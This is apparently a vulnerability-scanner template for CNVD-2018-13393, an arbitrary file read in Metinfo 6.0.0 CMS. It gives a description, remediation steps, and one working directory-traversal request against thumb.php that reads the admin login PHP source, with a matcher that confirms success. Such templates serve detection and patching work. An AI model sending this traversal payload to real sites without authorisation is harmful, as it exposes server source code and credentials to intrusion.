id: CNVD-2018-13393
info:
  name: Metinfo LFI
  author:
  - l0ne1y
  tags:
  - metinfo
  - cnvd
  - cvnd2018
  - lfi
  description: |-
    Metinfo 6.0.0 has an arbitrary file read vulnerability.
    MetInfo is a content management system developed with PHP and Mysql.

    Metinfo 6.0.0 has an arbitrary file read vulnerability. An attacker can exploit it to read sensitive files from the website (bypassing the previous patch).
  reference:
  - https://paper.seebug.org/676/
  severity: high
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site: https://www.metinfo.cn/

    Temporary Fix:
    1. Filter ".", preventing users from traversing to parent directories in the URL.
    2. Use strict regular-expression validation of user-input parameter formats. Hard-code or uniformly encode filename parameters passed by the user, use a whitelist for file types, and reject parameters containing malicious or null characters.
    3. Disable directory traversal services; for example, configure open_basedir in php.ini to restrict file access scope.
    4. Store file paths in the database and let users download files by submitting the corresponding file ID.
    5. Verify permissions before allowing a user to download a file.
requests:
- matchers:
  - type: word
    condition: and
    part: body
    words:
    - <?php
    - login_met_cookie($metinfo_admin_name);
  matchers-condition: and
  path:
  - '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
  method: GET
  max-redirects: 2
  redirects: true
